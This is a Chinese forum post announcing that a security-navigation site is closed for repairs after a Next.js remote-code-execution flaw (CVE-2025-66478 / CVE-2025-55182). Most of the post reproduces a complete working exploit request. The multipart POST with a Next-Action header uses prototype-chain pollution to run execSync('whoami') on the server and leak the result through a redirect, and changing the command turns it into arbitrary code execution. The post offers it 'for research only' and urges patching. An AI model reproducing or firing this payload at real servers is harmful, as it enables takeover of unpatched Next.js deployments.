找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

481

积分

0

好友

64

主题
发表于 22 小时前 | 查看: 6| 回复: 0

由于 0xShe 网络安全导航 受到 Next.js RCE 漏洞(CVE-2025-66478 / CVE-2025-55182) 的影响,现决定临时闭站修复,预计将持续数日。

在此期间,网站临时访问地址为:🔗https://sbbbb.cn

网站维护公告

网站重构说明

当前网站正在进行整体重构,部分页面可能出现异常或Bug,将在后续更新中逐步修复。

漏洞影响与修复进展

近期披露的 Next.js RCE 漏洞影响重大。为验证其实际危害,我们迅速进行了测试,结果证实该漏洞确实具备远程代码执行的能力。

目前,针对该漏洞的修复工作正在紧急进行中。待安全补丁完全生效后,网站将第一时间恢复服务。

漏洞详情与Payload分享

为提供技术研究参考,以下分享此次 Next.js RCE 漏洞的一个利用Payload(请注意:仅限用于安全研究与学习,严禁用于非法用途):

POST /apps HTTP/2
Host: xxx
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Content-Length: 693
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
X-Nextjs-Html-Request-Id: lMx9dPL6FzXWOlwazZgj
X-Nextjs-Request-Id: bafo0gfl
Accept-Encoding: gzip, deflate, br

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

该Payload利用了Node.js特定对象的原型链污染,最终达成命令执行。对于使用 Next.js 框架的开发者而言,这无疑是一次重要的网络安全警醒,务必及时更新至官方修复版本。

感谢各位的理解与支持,我们将在完成修复后尽快恢复服务。




上一篇:HertzBeat开源监控系统实战:无Agent部署与自定义监控告警
下一篇:433MHz软解码抗干扰优化实战:从20米到100米+的通信距离提升
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区(YunPan.Plus) ( 苏ICP备2022046150号-2 )

GMT+8, 2025-12-6 23:56 , Processed in 0.111453 second(s), 36 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2025 CloudStack.

快速回复 返回顶部 返回列表